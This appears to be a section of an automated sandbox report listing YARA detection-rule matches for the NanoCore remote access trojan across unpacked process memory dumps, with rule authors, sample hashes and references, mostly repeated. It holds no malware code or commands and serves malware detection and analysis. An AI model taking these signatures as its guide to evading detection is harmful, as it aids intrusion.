Source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 10.2.RegSvcs.exe.2c63db8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.2c496bc.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
